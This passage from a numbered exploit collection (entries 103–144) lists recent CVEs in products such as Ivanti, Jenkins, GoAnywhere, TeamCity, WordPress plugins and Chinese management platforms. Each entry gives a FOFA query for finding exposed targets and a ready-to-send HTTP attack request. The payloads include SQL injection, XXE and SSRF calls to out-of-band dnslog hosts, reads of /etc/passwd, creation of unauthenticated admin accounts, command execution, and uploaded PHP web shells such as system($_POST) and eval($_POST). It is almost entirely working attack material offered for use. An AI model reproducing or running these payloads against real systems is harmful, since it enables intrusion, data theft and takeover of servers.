</ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then visit /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin panel: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立讯 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed
